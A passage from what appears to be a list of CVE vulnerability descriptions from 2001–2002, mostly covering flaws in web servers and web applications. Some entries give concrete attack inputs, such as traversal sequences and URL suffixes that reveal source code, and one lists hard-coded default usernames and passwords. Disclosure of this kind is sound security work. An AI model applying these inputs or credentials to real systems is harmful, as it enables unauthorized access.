SimpleBar.dll, and possibly other DLLs. [CVE-2002-0708] Directory traversal vulnerability in the Web Reports Server for SurfControl SuperScout WebFilter allows remote attackers to read arbitrary files via an HTTP request containing ... (triple dot) sequences. [CVE-2002-0707] The Web Reports Server for SurfControl SuperScout WebFilter allows remote attackers to cause a denial of service (CPU consumption) via large GET requests, possibly due to a buffer overflow. [CVE-2002-0706] UserManager.js in the Web Reports Server for SurfControl SuperScout WebFilter uses weak encryption for administrator functions, which allows remote attackers to decrypt the administrative password using a hard-coded key in a Javascript function. [CVE-2002-0705] The Web Reports Server for SurfControl SuperScout WebFilter stores the "scwebusers" username and password file in a web-accessible directory, which allows remote attackers to obtain valid usernames and crack the passwords. [CVE-2002-0700] Buffer overflow in a system function that performs user authentication for Microsoft Content Management Server (MCMS) 2001 allows attackers to execute code in the Local System context by authenticating to a web page that calls the function, aka "Unchecked Buffer in MDAC Function Could Enable SQL Server Compromise." [CVE-2002-0692] Buffer overflow in SmartHTML Interpreter (shtml.dll) in Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to cause a denial of service (CPU consumption) or run arbitrary code, respectively, via a certain type of web file request. [CVE-2002-0687] The "through the web code" capability for Zope 2.0 through 2.5.1 b1 allows untrusted users to shut down the Zope server via certain headers. [CVE-2002-0686] Buffer overflow in the search component for iPlanet Web Server (iWS) 4.1 and Sun ONE Web Server 6.0 allows remote attackers to execute arbitrary code via a long argument to the NS-rel-doc-name parameter. [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet. [CVE-2002-0681] Cross-site scripting vulnerability in GoAhead Web Server 2.1 allows remote attackers to execute script as other web users via script in a URL that generates a "404 not found" message, which does not quote the script. [CVE-2002-0680] Directory traversal vulnerability in GoAhead Web Server 2.1 allows remote attackers to read arbitrary files via a URL with an encoded / (%5C) in a .. (dot dot) sequence. NOTE: it is highly likely that this candidate will be REJECTED because it has been reported to be a duplicate of CVE-2001-0228. [CVE-2002-0671] Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 downloads phone applications from a web site but can not verify the integrity of the applications, which could allow remote attackers to install Trojan horse applications via DNS spoofing. [CVE-2002-0627] The Web server for Polycom ViewStation before 7.2.4 allows remote attackers to bypass authentication and read files via Unicode encoded requests. [CVE-2002-0622] The Office Web Components (OWC) package installer for Microsoft Commerce Server 2000 allows remote attackers to execute commands by passing the commands as input to the OWC package installer, aka "OWC Package Command Execution". [CVE-2002-0621] Buffer overflow in the Office Web Components (OWC) package installer used by Microsoft Commerce Server 2000 allows remote attackers to cause the process to fail or run arbitrary code in the LocalSystem security context via certain input to the OWC package installer. [CVE-2002-0614] PHP-Survey 20000615 and earlier stores the global.inc file under the web root, which allows remote attackers to obtain sensitive information, including database credentials, if .inc files are not preprocessed by the server. [CVE-2002-0602] Snapgear Lite+ firewall 1.5.4 and 1.5.3 allows remote attackers to cause a denial of service (crash) via a large number of connections to (1) the HTTP web management port, or (2) the PPTP port. [CVE-2002-0596] WebTrends Reporting Center 4.0d allows remote attackers to determine the real path of the web server via a GET request to get_od_toc.pl with an empty Profile parameter, which leaks the pathname in an error message. [CVE-2002-0595] Buffer overflow in WTRS_UI.EXE (WTX_REMOTE.DLL) for WebTrends Reporting Center 4.0d allows remote attackers to execute arbitrary code via a long HTTP GET request to the /reports/ directory. [CVE-2002-0578] Buffer overflow in 4D WebServer 6.7.3 allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request with Basic Authentication containing a long (1) user name or (2) password. [CVE-2002-0565] Oracle 9iAS 1.0.2.x compiles JSP files in the _pages directory with world-readable permissions under the web root, which allows remote attackers to obtain sensitive information derived from the JSP code, including usernames and passwords, via a direct HTTP request to _pages. [CVE-2002-0562] The default configuration of Oracle 9i Application Server 1.0.2.x running Oracle JSP or SQLJSP stores globals.jsa under the web root, which allows remote attackers to gain sensitive information including usernames and passwords via a direct HTTP request to globals.jsa. [CVE-2002-0555] IBM Informix Web DataBlade 4.12 unescapes user input even if an application has escaped it, which could allow remote attackers to execute SQL code in a web form even when the developer has attempted to escape it. [CVE-2002-0554] webdriver in IBM Informix Web DataBlade 4.12 allows remote attackers to bypass user access levels or read arbitrary files via a SQL injection attack in an HTTP request. [CVE-2002-0544] Aprelium Abyss Web Server (abyssws) before 1.0.3 stores the administrative console password in plaintext in the abyss.conf file, which allows local users with access to the file to gain privileges. [CVE-2002-0543] Directory traversal vulnerability in Aprelium Abyss Web Server (abyssws) before 1.0.0.2 allows remote attackers to read files outside the web root, including the abyss.conf file, via URL-encoded .. (dot dot) sequences in the HTTP request. [CVE-2002-0537] The admin.html file in StepWeb Search Engine (SWS) 2.5 stores passwords in links to manager.pl, which allows remote attackers who can access the admin.html file to gain administrative privileges to SWS. [CVE-2002-0532] EMU Webmail allows local users to execute arbitrary programs via a .. (dot dot) in the HTTP Host header that points to a Trojan horse configuration file that contains a pageroot specifier that contains shell metacharacters. [CVE-2002-0531] Directory traversal vulnerability in emumail.cgi in EMU Webmail 4.5.x and 5.1.0 allows remote attackers to read arbitrary files or list arbitrary directories via a .. (dot dot) in the type parameter. [CVE-2002-0530] Cross-site scripting vulnerability in Novell Web Search 2.0.1 allows remote attackers to execute arbitrary script as other Web Search users via the search parameter. [CVE-2002-0521] Cross-site scripting vulnerabilities in ASP-Nuke RC2 and earlier allow remote attackers to execute script or gain privileges as other ASP-Nuke users via script in (1) the name parameter in downloads.asp, (2) the message parameter in Post.asp, or (3) a web site URL in profile.asp. [CVE-2002-0507] An interaction between Microsoft Outlook Web Access (OWA) with RSA SecurID allows local users to bypass the SecurID authentication for a previous user via several submissions of an OWA Authentication request with the proper OWA password for the previous user, which is eventually accepted by OWA. [CVE-2002-0494] Cross-site scripting vulnerability in WebSight Directory System 0.1 allows remote attackers to execute arbitrary Javascript and gain access to the WebSight administrator via a new link submission containing the script in a website name. [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions. [CVE-2002-0490] Instant Web Mail before 0.60 does not properly filter CR/LF sequences, which allows remote attackers to (1) execute arbitrary POP commands via the id parameter in message.php, or (2) modify certain mail message headers via numerous parameters in write.php. [CVE-2002-0483] index.php for PHP-Nuke 5.4 and earlier allows remote attackers to determine the physical pathname of the web server when the file parameter is set to index.php, which triggers an error message that leaks the pathname. [CVE-2002-0482] Directory traversal vulnerability in PCI Netsupport Manager before version 7, when running web extensions, allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTP GET request. [CVE-2002-0475] Cross-site scripting vulnerability in phpBB 1.4.4 and earlier allows remote attackers to execute arbitrary Javascript on web clients by embedding the script within an IMG image tag while editing a message. [CVE-2002-0474] Cross-site scripting vulnerability in ZeroForum allows remote attackers to execute arbitrary Javascript on web clients by embedding the script within IMG image tag. [CVE-2002-0466] Hosting Controller 1.4.1 and earlier allows remote attackers to browse arbitrary directories via a full C: style pathname in the filepath arguments to (1) Statsbrowse.asp, (2) servubrowse.asp, (3) browsedisk.asp, (4) browsewebalizerexe.asp, or (5) sqlbrowse.asp. [CVE-2002-0463] home.php in ARSC (Really Simple Chat) 1.0.1 and earlier allows remote attackers to determine the full pathname of the web server via an invalid language in the arsc_language parameter, which leaks the pathname in an error message. [CVE-2002-0462] bigsam_guestbook.php for Big Sam (Built-In Guestbook Stand-Alone Module) 1.1.08 and earlier allows remote attackers to cause a denial of service (CPU consumption) or obtain the absolute path of the web server via a displayBegin parameter with a very large number, which leaks the web path in an error message when PHP safe_mode is enabled, or consumes resources when safe_mode is not enabled. [CVE-2002-0461] Internet Explorer 5.01 through 6 allows remote attackers to cause a denial of service (application crash) via Javascript in a web page that calls location.replace on itself, causing a loop. [CVE-2002-0459] Cross-site scripting vulnerability in Board-TNK 1.3.1 and earlier allows remote attackers to execute arbitrary Javascript via the WEB parameter. [CVE-2002-0458] Cross-site scripting vulnerability in News-TNK 1.2.1 and earlier allows remote attackers to execute arbitrary Javascript via the WEB parameter. [CVE-2002-0450] Buffer overflow in Talentsoft Web+ 5.0 and earlier allows remote attackers to execute arbitrary code via a long Web Markup Language (wml) file name to (1) webplus.dll or (2) webplus.exe. [CVE-2002-0449] Buffer overflow in webpsvc.exe for Talentsoft Web+ 5.0 and earlier allows remote attackers execute arbitrary code via a long argument to webplus.exe program, which triggers the overflow in webpsvc.exe. [CVE-2002-0448] Xerver Free Web Server 2.10 and earlier allows remote attackers to cause a denial of service (crash) via an HTTP request that contains many "C:/" sequences. [CVE-2002-0447] Directory traversal vulnerability in Xerver Free Web Server 2.10 and earlier allows remote attackers to list arbitrary directories via a .. (dot dot) in an HTTP GET request. [CVE-2002-0446] categorie.php3 in Black Tie Project (BTP) 0.4b through 0.5b allows remote attackers to determine the absolute path of the web server via an invalid category ID (cid) parameter, which leaks the pathname in an error message. [CVE-2002-0440] Trend Micro InterScan VirusWall HTTP proxy 3.6 with the "Skip scanning if Content-length equals 0" option enabled allows malicious web servers to bypass content scanning via a Content-length header set to 0, which is often ignored by HTTP clients. [CVE-2002-0438] ZyXEL ZyWALL 10 before 3.50 allows remote attackers to cause a denial of service via an ARP packet with the firewall's IP address and an incorrect MAC address, which causes the firewall to disable the LAN interface. [CVE-2002-0433] Pi3Web 2.0.0 allows remote attackers to view restricted files via an HTTP request containing a "" (wildcard or asterisk) character. [CVE-2002-0430] MultiFileUploadHandler.php in the Sun Cobalt RaQ XTR administration interface allows local users to bypass authentication and overwrite arbitrary files via a symlink attack on a temporary file, followed by a request to MultiFileUpload.php. [CVE-2002-0429] The iBCS routines in arch/i386/kernel/traps.c for Linux kernels 2.4.18 and earlier on x86 systems allow local users to kill arbitrary processes via a a binary compatibility interface (lcall). [CVE-2002-0422] IIS 5 and 5.1 supporting WebDAV methods allows remote attackers to determine the internal IP address of the system (which may be obscured by NAT) via (1) a PROPFIND HTTP request with a blank Host header, which leaks the address in an HREF property in a 207 Multi-Status response, or (2) via the WRITE or MKCOL method, which leaks the IP in the Location server header. [CVE-2002-0415] Directory traversal vulnerability in the web server used in RealPlayer 6.0.7, and possibly other versions, may allow local users to read files that are accessible to RealPlayer via a .. (dot dot) in an HTTP GET request to port 1275. [CVE-2002-0396] The web management server for Red-M 1050 (Bluetooth Access Point) does not use session-based credentials to authenticate users, which allows attackers to connect to the server from the same IP address as a user who has already established a session. [CVE-2002-0386] The administration module for Oracle Web Cache in Oracle9iAS (9i Application Suite) 9.0.2 allows remote attackers to cause a denial of service (crash) via (1) an HTTP GET request containing a ".." (dot dot) sequence, or (2) a malformed HTTP GET request with a chunked Transfer-Encoding with missing data. [CVE-2002-0377] Gaim 0.57 stores sensitive information in world-readable and group-writable files in the /tmp directory, which allows local users to access MSN web email accounts of other users who run Gaim by reading authentication information from the files. [CVE-2002-0364] Buffer overflow in the chunked encoding transfer mechanism in IIS 4.0 and 5.0 allows attackers to execute arbitrary code via the processing of HTR request sessions, aka "Heap Overrun in HTR Chunked Encoding Could Enable Web Server Compromise." [CVE-2002-0347] Directory traversal vulnerability in Cobalt RAQ 4 allows remote attackers to read password-protected files, and possibly files outside the web root, via a .. (dot dot) in an HTTP request. [CVE-2002-0341] GWWEB.EXE in GroupWise Web Access 5.5, and possibly other versions, allows remote attackers to determine the full pathname of the web server via an HTTP request with an invalid HTMLVER parameter. [CVE-2002-0335] Buffer overflow in Galacticomm Worldgroup web server 3.20 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long HTTP GET request. [CVE-2002-0324] Greymatter 1.21c and earlier with the Bookmarklet feature enabled allows remote attackers to read a cleartext password and gain administrative privileges by guessing the name of a gmrightclick-.reg file which contains the administrator name and password in cleartext, then retrieving the file from the web server before the Greymatter administrator performs a "Clear And Exit" action. [CVE-2002-0323] comment2.jse in ScriptEase:WebServer allows remote attackers to read arbitrary files by specifying the target file as an argument in the URL. [CVE-2002-0317] Gator ActiveX component (IEGator.dll) 3.0.6.1 allows remote web sites to install arbitrary software by specifying a Trojan Gator installation file (setup.ex_) in the src parameter. [CVE-2002-0313] Buffer overflow in Essentia Web Server 2.1 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long URL. [CVE-2002-0312] Directory traversal vulnerability in Essentia Web Server 2.1 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL. [CVE-2002-0311] Vulnerability in webtop in UnixWare 7.1.1 and Open UNIX 8.0.0 allows local and possibly remote attackers to gain root privileges via shell metacharacters in the -c argument for (1) in scoadminreg.cgi or (2) service_action.cgi. [CVE-2002-0310] Netwin WebNews 1.1k CGI program includes several default usernames and cleartext passwords that cannot be deleted by the administrator, which allows remote attackers to gain privileges via the username/password combinations (1) testweb/newstest, (2) alwn3845/imaptest, (3) alwi3845/wtest3452, or (4) testweb2/wtest4879. [CVE-2002-0309] SMTP proxy in Symantec Enterprise Firewall (SEF) 6.5.x includes the firewall's physical interface name and address in an SMTP protocol exchange when NAT translation is made to an address other than the firewall, which could allow remote attackers to determine certain firewall configuration information. [CVE-2002-0298] ScriptEase MiniWeb Server 0.95 allows remote attackers to cause a denial of service (crash) via certain HTTP GET requests containing (1) a %2e%2e (encoded dot-dot), (2) several /../ (dot dot) sequences, (3) a missing URI, or (4) several ../ in a URI that does not begin with a / (slash) character. [CVE-2002-0297] Buffer overflow in ScriptEase MiniWeb Server 0.95 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long URL in an HTTP request. [CVE-2002-0291] Dino's Webserver 1.2 allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via several large HTTP requests within a short time. [CVE-2002-0290] Buffer overflow in Netwin WebNews CGI program 1.1, Webnews.exe, allows remote attackers to execute arbitrary code via a long group argument. [CVE-2002-0289] Buffer overflow in Phusion web server 1.0 allows remote attackers to cause a denial of service and execute arbitrary code via a long HTTP request. [CVE-2002-0288] Directory traversal vulnerability in Phusion web server 1.0 allows remote attackers to read arbitrary files via a ... (triple dot dot) in the HTTP request. [CVE-2002-0284] Winamp 2.78 and 2.77, when opening a wma file that requires a license, sends the full path of the Temporary Internet Files directory to the web page that is processing the license, which could allow malicious web servers to obtain the pathname. [CVE-2002-0275] Falcon web server 2.0.0.1020 and earlier allows remote attackers to bypass authentication and read restricted files via an extra / (slash) in the requested URL. [CVE-2002-0270] Opera, when configured with the "Determine action by MIME type" option disabled, interprets an object as an HTML document even when its MIME Content-Type is text/plain, which could allow remote attackers to execute arbitrary script in documents that the user does not expect, possibly through web applications that use a text/plain type to prevent cross-site scripting attacks. [CVE-2002-0269] Internet Explorer 5.x and 6 interprets an object as an HTML document even when its MIME Content-Type is text/plain, which could allow remote attackers to execute arbitrary script in documents that the user does not expect, possibly through web applications that use a text/plain type to prevent cross-site scripting attacks. [CVE-2002-0266] Thunderstone Texis CGI script allows remote attackers to obtain the full path of the web root via a request for a nonexistent file, which generates an error message that includes the full pathname. [CVE-2002-0262] Directory traversal vulnerability in netget for Sybex E-Trainer web server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. [CVE-2002-0258] Merak Mail IceWarp Web Mail uses a static identifier as a user session ID that does not change across sessions, which could allow remote attackers with access to the ID to gain privileges as that user, e.g. by extracting the ID from the user's answer or forward URLs. [CVE-2002-0252] Buffer overflow in Apple QuickTime Player 5.01 and 5.02 allows remote web servers to execute arbitrary code via a response containing a long Content-Type MIME header. [CVE-2002-0250] Web configuration utility in HP AdvanceStack hubs J3200A through J3210A with firmware version A.03.07 and earlier, allows unauthorized users to bypass authentication via a direct HTTP request to the web_access.html file, which allows the user to change the switch's configuration and modify the administrator password. [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message. [CVE-2002-0233] Directory traversal vulnerability in eshare Expressions 4 Web server allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP request. [CVE-2002-0228] Microsoft MSN Messenger allows remote attackers to use Javascript that references an ActiveX object to obtain sensitive information such as display names and web site navigation, and possibly more when the user is connected to certain Microsoft sites (or DNS-spoofed sites). [CVE-2002-0217] Cross-site scripting (CSS) vulnerabilities in the Private Message System for XOOPS 1.0 RC1 allow remote attackers to execute Javascript on other web clients via (1) the Title field or a Private Message Box or (2) the image field parameter in pmlite.php. [CVE-2002-0209] Nortel Alteon ACEdirector WebOS 9.0, with the Server Load Balancing (SLB) and Cookie-Based Persistence features enabled, allows remote attackers to determine the real IP address of a web server with a half-closed session, which causes ACEdirector to send packets from the server without changing the address to the virtual IP address. [CVE-2002-0203] ttawebtop.cgi in Tarantella Enterprise 3.20 on SPARC Solaris and Linux, and 3.1x and 3.0x including 3.11.903, allows remote attackers to view directory contents via an empty pg parameter. [CVE-2002-0201] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow. [CVE-2002-0200] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name. [CVE-2002-0196] GetRelativePath in ACD Incorporated CwpAPI 1.1 only verifies if the server root is somewhere within the path, which could allow remote attackers to read or write files outside of the web root, in other directories whose path includes the web root. [CVE-2002-0190] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code under fewer security restrictions via a malformed web page that requires NetBIOS connectivity, aka "Zone Spoofing through Malformed Web Page" vulnerability. [CVE-2002-0181] Cross-site scripting vulnerability in status.php3 for IMP 2.2.8 and HORDE 1.2.7 allows remote attackers to execute arbitrary web script and steal cookies of other IMP/HORDE users via the script parameter. [CVE-2002-0180] Buffer overflow in Webalizer 2.01-06, when configured to use reverse DNS lookups, allows remote attackers to execute arbitrary code by connecting to the monitored web server from an IP address that resolves to a long hostname. [CVE-2002-0166] Cross-site scripting vulnerability in analog before 5.22 allows remote attackers to execute Javascript via an HTTP request containing the script, which is entered into a web logfile and not properly filtered by analog during display. [CVE-2002-0160] The administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to read HTML, Java class, and image files outside the web root via a ..\.. (modified ..) in the URL to port 2002. [CVE-2002-0142] CGI handler in John Roy Pi3Web for Windows 2.0 beta 1 and 2 allows remote attackers to cause a denial of service (crash) via a series of requests whose physical path is exactly 260 characters long and ends in a series of . (dot) characters. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0131] ActivePython ActiveX control for Python in the AXScript package, when used in Internet Explorer, does not prevent a script from reading files from the client's filesystem, which allows remote attackers to read arbitrary files via a malicious web page containing Python script. [CVE-2002-0127] Netgear RP114 Cable/DSL Web Safe Router Firmware 3.26, when configured to block traffic below port 1024, allows remote attackers to cause a denial of service (hang) via a port scan of the WAN port. [CVE-2002-0124] MDG Computer Services Web Server 4D/eCommerce 3.5.3 allows remote attackers to exploit directory traversal vulnerability via a ../ (dot dot) containing URL-encoded slashes in the HTTP request. [CVE-2002-0123] MDG Computer Services Web Server 4D WS4D/eCommerce 3.0 and earlier, and possibly 3.5.3, allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long HTTP request. [CVE-2002-0121] PHP 4.0 through 4.1.1 stores session IDs in temporary files whose name contains the session ID, which allows local users to hijack web connections. [CVE-2002-0111] Directory traversal vulnerability in Funsoft Dino's Webserver 1.2 and earlier allows remote attackers to read files or execute arbitrary commands via a .. (dot dot) in the URL. [CVE-2002-0106] BEA Systems Weblogic Server 6.1 allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name. [CVE-2002-0103] An installer program for Oracle9iAS Web Cache 2.0.0.x creates executable and configuration files with insecure permissions, which allows local users to gain privileges by (1) running webcached or (2) obtaining the administrator password from webcache.xml. [CVE-2002-0102] Oracle9iAS Web Cache 2.0.0.x allows remote attackers to cause a denial of service via (1) a request to TCP ports 1100, 4000, 4001, and 4002 with a large number of null characters, and (2) a request to TCP port 4000 with a large number of "." characters. [CVE-2002-0099] Buffer overflow in Michael Lamont Savant Web Server 3.0 allows remote attackers to cause a denial of service (crash) via a long HTTP request to the cgi-bin directory in which the CGI program name contains a large number of . (dot) characters. [CVE-2002-0098] Buffer overflow in index.cgi administration interface for Boozt! Standard 0.9.8 allows local users to execute arbitrary code via a long name field when creating a new banner. [CVE-2002-0075] Cross-site scripting vulnerability for Internet Information Server (IIS) 4.0, 5.0 and 5.1 allows remote attackers to execute arbitrary script as other web users via the error message used in a URL redirect (""302 Object Moved") message. [CVE-2002-0058] Vulnerability in Java Runtime Environment (JRE) allows remote malicious web sites to hijack or sniff a web client's sessions, when an HTTP proxy is being used, via a Java applet that redirects the session to another server, as seen in (1) Netscape 6.0 through 6.1 and 4.79 and earlier, (2) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, and possibly other implementations that use vulnerable versions of SDK or JDK. [CVE-2002-0022] Buffer overflow in the implementation of an HTML directive in mshtml.dll in Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via a web page that specifies embedded ActiveX controls in a way that causes 2 Unicode strings to be concatenated. [CVE-2001-1575] Apple Personal Web Sharing (PWS) 1.1, 1.5, and 1.5.5, when Web Sharing authentication is enabled, allows remote attackers to cause a denial of service via a long password, possibly due to a buffer overflow. [CVE-2001-1560] Win32k.sys (aka Graphics Device Interface (GDI)) in Windows 2000 and XP allows local users to cause a denial of service (system crash) by calling the ShowWindow function after receiving a WM_NCCREATE message. [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep. [CVE-2001-1544] Directory traversal vulnerability in Macromedia JRun Web Server (JWS) 2.3.3, 3.0 and 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the HTTP GET request. [CVE-2001-1542] NAI WebShield SMTP 4.5 and possibly 4.5 MR1a does not filter improperly MIME encoded email attachments, which could allow remote attackers to bypass filtering and possibly execute arbitrary code in email clients that process the invalid attachments. [CVE-2001-1537] The default "basic" security setting' in config.php for TWIG webmail 2.7.4 and earlier stores cleartext usernames and passwords in cookies, which could allow attackers to obtain authentication information and gain privileges. [CVE-2001-1532] WebX stores authentication information in the HTTP_REFERER variable, which is included in URL links within bulletin board messages posted by users, which could allow remote attackers to hijack user sessions. [CVE-2001-1530] run.cgi in Webmin 0.80 and 0.88 creates temporary files with world-writable permissions, which allows local users to execute arbitrary commands. [CVE-2001-1526] Cross-site scripting (XSS) vulnerability in the comments action in index.php in easyNews 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the zeit parameter. [CVE-2001-1524] Cross-site scripting (XSS) vulnerability in PHP-Nuke 5.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) uname parameter in user.php, (2) ttitle, letter and file parameters in modules.php, (3) subject, story and storyext parameters in submit.php, (4) upload parameter in admin.php and (5) fname parameter in friend.php. [CVE-2001-1523] Cross-site scripting (XSS) vulnerability in the DMOZGateway module for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the topic parameter. [CVE-2001-1522] Cross-site scripting (XSS) vulnerability in im.php in IMessenger for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via a message. [CVE-2001-1521] Cross-site scripting (XSS) vulnerability in user.php in PostNuke 0.64 allows remote attackers to inject arbitrary web script or HTML via the uname parameter. [CVE-2001-1516] Cross-site scripting (XSS) vulnerability in phpReview 0.9.0 rc2 and earlier allows remote attackers to inject arbitrary web script or HTML via user-submitted reviews. [CVE-2001-1513] Macromedia JRun 3.0 and 3.1 allows remote attackers to obtain duplicate active user session IDs and perform actions as other users via a URL request for the web application directory without the trailing '/' (slash), as demonstrated using ctx. [CVE-2001-1512] Unknown vulnerability in Allaire JRun 3.1 allows remote attackers to directly access the WEB-INF and META-INF directories and execute arbitrary JavaServer Pages (JSP), a variant of CVE-2000-1050. [CVE-2001-1511] JRun 3.0 and 3.1 running on JRun Web Server (JWS) and IIS allows remote attackers to read arbitrary JavaServer Pages (JSP) source code via a request URL containing the source filename ending in (1) "jsp%00" or (2) "js%2570". [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL. [CVE-2001-1502] webcart.cgi in Mountain Network Systems WebCart 8.4 allows remote attackers to execute arbitrary commands via shell metacharacters in the NEXTPAGE parameter. [CVE-2001-1491] Opera 5.11 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images. [CVE-2001-1490] Mozilla 0.9.6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images. [CVE-2001-1489] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images. [CVE-2001-1468] PHP remote file inclusion vulnerability in checklogin.php in phpSecurePages 0.24 and earlier allows remote attackers to execute arbitrary PHP code by modifying the cfgProgDir parameter to reference a URL on a remote web server that contains the code. [CVE-2001-1462] WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to cause the WebID agent to enter debug mode via a URL containing null characters, which may allow attackers to obtain sensitive information. [CVE-2001-1461] Directory traversal vulnerability in WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to access restricted resources via URL-encoded (1) /.. or (2) \.. sequences. [CVE-2001-1458] Directory traversal vulnerability in Novell GroupWise 5.5 and 6.0 allows remote attackers to read arbitrary files via a request for /servlet/webacc?User.html= that contains "../" (dot dot) sequences and a null character. [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories. [CVE-2001-1446] Find-By-Content in Mac OS X 10.0 through 10.0.4 creates world-readable index files named .FBCIndex in every directory, which allows remote attackers to learn the contents of files in web accessible directories. [CVE-2001-1437] easyScripts easyNews 1.5 allows remote attackers to obtain the full path of the web root via a view request with a non-integer news message id field, which leaks the path in a PHP error message when the script times out. [CVE-2001-1433] Cherokee web server before 0.2.7 does not properly drop root privileges after binding to port 80, which could allow remote attackers to gain privileges via other vulnerabilities. [CVE-2001-1432] Directory traversal vulnerability in Cherokee Web Server allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2001-1416] Multiple cross-site scripting (XSS) vulnerabilities in the log messages in certain Alpha versions of AOL Instant Messenger (AIM) 4.4 allow remote attackers to execute arbitrary web script or HTML via an image in the (1) DATA, (2) STYLE, or (3) BINARY tags. [CVE-2001-1408] Directory traversal vulnerability in readmsg.php in WebMail 2.0.1 in Cobalt Qube 3 allows remote attackers to read arbitrary files via a .. (dot dot) in the mailbox parameter. [CVE-2001-1403] Bugzilla before 2.14 includes the username and password in URLs, which could allow attackers to gain privileges by reading the information from the web server logs, or by "shoulder-surfing" and observing the web browser's location bar. [CVE-2001-1368] Vulnerability in iPlanet Web Server 4 included in Virtualvault Operating System (VVOS) 4.0 running HP-UX 11.04 could allow attackers to corrupt data. [CVE-2001-1363] Vulnerability in phpWebSite before 0.7.9 related to running multiple instances in the same domain, which may allow attackers to gain administrative privileges. [CVE-2001-1361] Vulnerability in The Web Information Gateway (TWIG) 2.7.1, possibly related to incorrect security rights and/or the generation of mailto links. [CVE-2001-1352] Cross-site scripting vulnerability in Namazu 2.0.9 and earlier allows remote attackers to execute arbitrary Javascript as other web users via an error message that is returned when an invalid index file is specified in the idxname parameter. [CVE-2001-1351] Cross-site scripting vulnerability in Namazu 2.0.8 and earlier allows remote attackers to execute arbitrary Javascript as other web users via the index file name that is displayed when displaying hit numbers. [CVE-2001-1350] Cross-site scripting vulnerability in namazu.cgi for Namazu 2.0.7 and earlier allows remote attackers to execute arbitrary Javascript as other web users via the lang parameter. [CVE-2001-1344] WSSecurity.pl in WebStore allows remote attackers to bypass authentication by providing the program with a filename that exists, which is made easier by (1) inserting a null character or (2) .. (dot dot). [CVE-2001-1343] ws_mail.cgi in WebStore 400/400CS 4.14 allows remote authenticated WebStore administrators to execute arbitrary code via shell metacharacters in the kill parameter. [CVE-2001-1341] The Beck GmbH IPC@Chip embedded web server installs the chipcfg.cgi program by default, which allows remote attackers to obtain sensitive network information via a request to the program. [CVE-2001-1337] Beck IPC GmbH IPC@CHIP Embedded-Webserver allows remote attackers to cause a denial of service via a long HTTP request. [CVE-2001-1305] ICQ 2001a Alpha and earlier allows remote attackers to automatically add arbitrary UINs to an ICQ user's contact list via a URL to a web page with a Content-Type of application/x-icq, which is processed by Internet Explorer. [CVE-2001-1302] The change password option in the Windows Security interface for Windows 2000 allows attackers to use the option to attempt to change passwords of other users on other systems or identify valid accounts by monitoring error messages, possibly due to a problem in the NetuserChangePassword function. [CVE-2001-1299] Zorbat Zorbstats PHP script before 0.9 allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1298] Webodex PHP script 1.0 and earlier allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1296] More.groupware PHP script allows remote attackers to include arbitrary files from remote web sites via an HTTP request that sets the includedir variable. [CVE-2001-1293] Buffer overflow in web server of 3com HomeConnect Cable Modem External with USB (#3CR29223) allows remote attackers to cause a denial of service (crash) via a long HTTP request. [CVE-2001-1287] Buffer overflow in Web Calendar in Ipswitch IMail 7.04 and earlier allows remote attackers to execute arbitrary code via a long 